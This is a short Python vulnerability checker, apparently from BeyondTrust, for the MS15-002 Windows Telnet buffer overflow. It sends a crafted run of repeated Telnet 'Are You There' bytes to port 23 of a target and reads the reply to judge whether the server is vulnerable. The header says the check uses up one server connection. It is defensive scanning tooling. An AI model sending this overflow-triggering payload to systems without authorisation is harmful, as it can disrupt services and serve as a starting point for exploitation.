MS15-002 Checker

1. # BeyondTrust Research MS15-002 Checker
2. # Note this checker is not safe in that it will exhaust 1 connection as defined in
3. # Software\\Microsoft\\TelnetServer\\1.0\\MaxConnections
4.  
5. import binascii
6. import socket
7. import random
8. import time
9. import sys
10. import os
11.  
12. NUM_COMMANDS = 229
13. COMMAND = "f6"
14. PORT = 23
15. HOST = ""
16.  
17. def printBanner():
18.     print "----"
19.     print "BeyondTrust MS15-002 Checker"
20.     print "----"
21.    
22. def usage():
23.     print os.path.basename(sys.argv[0]) + " <target>"
24.  
25. def getPayload():
26.     evil = ""
27.     for i in xrange(0,NUM_COMMANDS):
28.         evil += "ff" + COMMAND
29.     return evil
30.  
31. def main():
32.     printBanner()
33.     if len(sys.argv) < 2:
34.         usage()
35.         exit(1)
36.     HOST = sys.argv[1]
37.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
38.     s.settimeout(5.0)
39.     try:
40.         s.connect((HOST, PORT))
41.     except:
42.         print "[E] Could not establish connection"
43.         s.close()
44.         exit(1)
45.        
46.     s.send(binascii.unhexlify(getPayload()))
47.  
48.     try:
49.         sessionSetupResponse = s.recv(256)
50.     except:
51.         # no response to initial packet, bail
52.         print "[E] Unable to contact telnet server"
53.         s.close()
54.         exit(1)
55.     ayt_resp = ""
56.     try:
57.         ayt_resp = s.recv(2048)
58.     except:
59.         print "[*] VULNERABLE"
60.         s.close()
61.         exit(1)
62.     if ayt_resp.lower().count("yes") == 227: #this will also avoid inetutils (will return 229 yes)
63.         print "[*] Patched"
64.     s.close()
65.  
66. if __name__ == "__main__":
67.     main()